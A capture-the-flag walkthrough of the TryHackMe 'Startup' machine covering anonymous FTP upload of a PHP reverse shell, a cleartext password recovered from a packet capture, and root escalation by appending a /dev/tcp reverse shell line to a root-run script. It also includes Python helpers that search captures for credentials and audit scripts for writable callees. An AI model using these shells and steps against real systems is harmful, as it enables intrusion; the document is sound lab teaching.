Disclaimer

The host attacked in this write-up was lawfully authorized for testing. The tools and methods shown are for learning and exchange only. Do not use the tools or the attack path described here for any unlawful purpose; the author accepts no responsibility for any consequences, misuse or damage arising from them.

Service scan

┌──(root㉿kali)-[~]
└─# nmap -sV -Pn 10.10.171.61
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 02:51 EDT
Nmap scan report for 10.10.171.61
Host is up (0.32s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.61 seconds

Three services are exposed: FTP (vsftpd 3.0.3), SSH (OpenSSH 7.2p2) and HTTP (Apache 2.4.18).

Anonymous FTP login

┌──(root㉿kali)-[~/tryhackme/Startup]
└─# ftp 10.10.171.61
Connected to 10.10.171.61.
220 (vsFTPd 3.0.3)
Name (10.10.171.61:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 .
drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 ..
-rw-r--r--    1 0        0               5 Nov 12  2020 .test.log
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.

Download everything for local analysis. The ftp directory is empty, but note its mode: drwxrwxrwx, so the anonymous user can write into it.

Contents of notice.txt

┌──(root㉿kali)-[~/tryhackme/Startup]
└─# cat notice.txt
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

Maya might be an SSH username? Also worth noting: the note says people download documents from this share through the website, which hints that the FTP root is also served over HTTP.

important.jpg shows two lines of text:

Everybody asks who's the impostor
but nobody asks how's the impostor

Nothing obviously useful there.

Attacking port 80

Opening the web service shows a single message:

No spice here!
Please excuse us as we develop our site. We want to make it the most stylish and convienient way to buy peppers. Plus, we need a web developer. BTW if you're a web developer, contact us. Otherwise, don't you worry. We'll be online shortly!
— Dev Team

The page source contains one HTML comment:

when are we gonna update this??

Directory brute force

┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.171.61

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.171.61/_21-11-06_03-07-44.txt

Error Log: /root/dirsearch/logs/errors-21-11-06_03-07-44.log

Target: http://10.10.171.61/

[03:07:45] Starting:
[03:08:41] 301 -  312B  - /files  ->  http://10.10.171.61/files/
[03:08:42] 200 -    1KB - /files/
[03:08:47] 200 -  808B  - /index.html

There is a /files directory, and its listing is identical to the FTP root: Apache is serving the same directory tree that anonymous FTP lets us write to. The attack path is therefore simple: upload a PHP reverse shell over FTP into the writable ftp directory, then request it through the web server (it lands under /files/ftp/) so Apache executes it and connects back to us. Before relying on this it is worth confirming two things that the listing alone does not prove: that a file uploaded over FTP really appears under /files/, and that Apache executes .php files in that path rather than serving them as text. Both turn out to be true here.

Uploading the webshell over FTP

┌──(root㉿kali)-[~/tryhackme/Startup]
└─# ftp 10.10.171.61
Connected to 10.10.171.61.
220 (vsFTPd 3.0.3)
Name (10.10.171.61:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ftp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put /root/reverse-shell.php ./shell.php
local: /root/reverse-shell.php remote: ./shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
3460 bytes sent in 0.00 secs (28.6932 MB/s)

Start a listener, request the uploaded file over HTTP, and catch the reverse shell as www-data:

┌──(root㉿kali)-[~/tryhackme/Startup]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 46938
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 07:14:50 up 24 min,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

The filesystem root contains a file recipe.txt:

www-data@startup:/$ cat recipe.txt
cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

What is the secret spicy soup recipe?

love

Moving laterally to lennie

/home contains a single user directory, lennie, but www-data has no permission to read it.
/etc/passwd lists one more interactive user: vagrant.

The filesystem root also has a directory named incidents, owned by www-data, containing one file: suspicious.pcapng. Transfer it back to Kali for analysis.

Opening the capture in Wireshark, it appears to be the network traffic of a previous intruder.
Frame 177 contains lennie's password in cleartext:

c4ntg3t3n0ughsp1c3
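Wireshark is the quickest way to find a cleartext credential in a capture, but the same search can be done headless. The script below is an added example, not part of the original write-up or of the box: it parses a pcapng file with the Python standard library only, numbers frames the way Wireshark does (one per Enhanced Packet Block), carves the TCP payload out of each Ethernet/IPv4/TCP packet, and reports payload lines that mention a password keyword. The capture it runs on is constructed inline by build_sample_pcapng(); the addresses, ports and the PASS string in it are placeholders, not data from suspicious.pcapng, and the keyword list is a heuristic you would tune per protocol.

```python
"""Added example (not from the original write-up): find cleartext
credentials in a pcapng capture using only the standard library.
The sample capture is constructed below; every value in it is a
placeholder."""
import struct

SHB, IDB, EPB = 0x0A0D0D0A, 0x00000001, 0x00000006  # pcapng block types


def _block(btype, body):
    """Wrap body in a pcapng block: type, total length, body, total length."""
    body += b"\x00" * (-len(body) % 4)           # bodies are padded to 32 bits
    total = 12 + len(body)
    return struct.pack("<II", btype, total) + body + struct.pack("<I", total)


def _tcp_frame(src, dst, sport, dport, payload):
    """Ethernet/IPv4/TCP frame carrying payload (checksums left as zero)."""
    eth = b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 1, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return eth + ip + tcp + payload


def build_sample_pcapng(frames):
    """Constructed pcapng: section header, one Ethernet interface, one EPB per frame."""
    out = _block(SHB, struct.pack("<IHHq", 0x1A2B3C4D, 1, 0, -1))
    out += _block(IDB, struct.pack("<HHI", 1, 0, 65535))
    for data in frames:
        out += _block(EPB, struct.pack("<IIIII", 0, 0, 0, len(data), len(data)) + data)
    return out


def tcp_payloads(pcapng):
    """Yield (frame_no, src, dst, dport, payload) for every IPv4/TCP packet."""
    off, frame_no = 0, 0
    while off + 12 <= len(pcapng):
        btype, total = struct.unpack_from("<II", pcapng, off)
        if btype == EPB:
            frame_no += 1                        # Wireshark's frame number
            caplen = struct.unpack_from("<I", pcapng, off + 20)[0]
            pkt = pcapng[off + 28: off + 28 + caplen]
            if len(pkt) >= 34 and pkt[12:14] == b"\x08\x00" and pkt[23] == 6:
                ihl = (pkt[14] & 0x0F) * 4
                ip_len = struct.unpack_from("!H", pkt, 16)[0]
                src = ".".join(map(str, pkt[26:30]))
                dst = ".".join(map(str, pkt[30:34]))
                tcp = pkt[14 + ihl: 14 + ip_len]
                doff = (tcp[12] >> 4) * 4
                dport = struct.unpack_from("!H", tcp, 2)[0]
                yield frame_no, src, dst, dport, tcp[doff:]
        off += total


def find_credentials(pcapng, keywords=(b"PASS", b"password", b"passwd")):
    """Return [(frame_no, src, dst, line)] for payload lines mentioning a keyword."""
    hits = []
    for frame_no, src, dst, _dport, payload in tcp_payloads(pcapng):
        for line in payload.splitlines():
            if any(k.lower() in line.lower() for k in keywords):
                hits.append((frame_no, src, dst, line.decode("latin-1")))
    return hits


# Constructed sample: a short FTP login. Nothing here comes from the real capture.
SAMPLE = build_sample_pcapng([
    _tcp_frame("10.0.0.5", "10.0.0.9", 40000, 21, b"USER lennie\r\n"),
    _tcp_frame("10.0.0.9", "10.0.0.5", 21, 40000, b"331 Please specify the password.\r\n"),
    _tcp_frame("10.0.0.5", "10.0.0.9", 40000, 21, b"PASS placeholder-secret\r\n"),
])

if __name__ == "__main__":
    for frame_no, src, dst, line in find_credentials(SAMPLE):
        print(f"frame {frame_no}: {src} -> {dst}: {line}")
```

To run it against a real file, read the bytes of suspicious.pcapng and pass them to find_credentials(); the frame numbers it prints line up with Wireshark's, so a hit can be cross-checked in the GUI. The keyword match deliberately also fires on the server's "331 ... password" prompt, which is useful: it tells you which frame to look at next even when the client sends the secret in a form you did not anticipate.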

Getting user.txt

www-data@startup:/tmp$ su lennie
su lennie
Password: c4ntg3t3n0ughsp1c3
lennie@startup:/tmp$ cd /home
cd /home
lennie@startup:/home$ ls
ls
lennie
lennie@startup:/home$ cd lennie
cd lennie
lennie@startup:~$ ls
ls
Documents  scripts  user.txt

Escalating to root

Look at the scripts directory and the scripts inside it:

lennie@startup:~$ cd scripts
cd scripts
lennie@startup:~/scripts$ ls -alh
ls -alh
total 16K
drwxr-xr-x 2 root   root   4.0K Nov 12  2020 .
drwx------ 6 lennie lennie 4.0K Nov  6 08:43 ..
-rwxr-xr-x 1 root   root     77 Nov 12  2020 planner.sh
-rw-r--r-- 1 root   root      1 Nov  6 08:57 startup_list.txt
lennie@startup:~/scripts$ cat planner.sh
cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"
lennie@startup:~/scripts$ ls -alh /etc/print.sh
ls -alh /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12  2020 /etc/print.sh

Analysis

planner.sh is owned by root and is not writable by an ordinary user. Its name suggests a scheduled task, and the evidence supports that: startup_list.txt, the file planner.sh writes, is owned by root and was modified at 08:57 today, minutes after the box booted, so something running as root is executing planner.sh periodically. The weak point is the second script it calls: /etc/print.sh is owned by user lennie (mode rwx------), so lennie can edit it freely, and whatever we append to it will run as root the next time planner.sh fires. Note that the call uses an absolute path, so this is not a PATH hijack; the whole bug is that root executes a file a low-privileged user owns. The general check is to compare the owner of every script root runs against the owner (and write bits) of every file it invokes or sources: a writable callee is as good as a writable cron job.
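The check described above can be automated. The script below is an added example, not part of the original write-up: given a script that root runs, it lists every absolute path the script references that the current user can write to, which is exactly how /etc/print.sh would have been flagged. It builds a constructed copy of the box's layout in a temporary directory (a read-only planner.sh that calls a print.sh we own); the paths are therefore assumptions for the demonstration, not the real files. One caveat to keep in mind: os.access() reports everything as writable when you are already root, so run it as the low-privileged user whose options you are assessing.

```python
"""Added example (not from the original write-up): flag files that a
root-run script invokes and that the current user may write. The sample
scripts are constructed in a temp dir and mirror planner.sh/print.sh."""
import os
import re
import tempfile

# An absolute path token: a slash not glued to a preceding path character,
# followed by path characters. Catches "/etc/print.sh" and "> /home/x/y.txt".
ABS_PATH = re.compile(r"(?<![\w./-])/[\w./-]+")


def writable_callees(script_path):
    """Absolute paths referenced in script_path that exist and that we may write."""
    with open(script_path) as fh:
        text = fh.read()
    found = sorted(set(ABS_PATH.findall(text)))
    # Only regular files matter here: a directory hit would need a different attack.
    return [p for p in found if os.path.isfile(p) and os.access(p, os.W_OK)]


def build_sample():
    """Constructed copy of the box's layout: root's planner.sh calls our print.sh.

    Returns (planner_path, print_path). planner.sh is made read-only to mimic
    the root-owned original; print.sh stays writable like /etc/print.sh was.
    """
    work = tempfile.mkdtemp()
    print_sh = os.path.join(work, "print.sh")
    with open(print_sh, "w") as fh:
        fh.write('#!/bin/bash\necho "Done!"\n')
    os.chmod(print_sh, 0o700)
    planner = os.path.join(work, "planner.sh")
    with open(planner, "w") as fh:
        fh.write(f"#!/bin/bash\necho $LIST > {work}/startup_list.txt\n{print_sh}\n")
    os.chmod(planner, 0o555)
    return planner, print_sh


if __name__ == "__main__":
    planner, _ = build_sample()
    for path in writable_callees(planner):
        print(f"{planner} runs {path}, which we can write")
```

Run it as lennie with the real path (writable_callees("/home/lennie/scripts/planner.sh")) and the only regular file it should report is /etc/print.sh; startup_list.txt is referenced too, but it is root-owned with mode 644, so it drops out.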

Attack

Append a reverse shell to /etc/print.sh:

lennie@startup:~/scripts$ echo "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh
<cho "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"
bash -i >& /dev/tcp/10.13.21.169/4242 0>&1

Start a listener on port 4242 and wait about a minute for the scheduled task to run; the connection comes back as root:

┌──(root㉿kali)-[~/tryhackme/Startup]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 49342
bash: cannot set terminal process group (2909): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@startup:~# cat /root/root.txt
cat /root/root.txt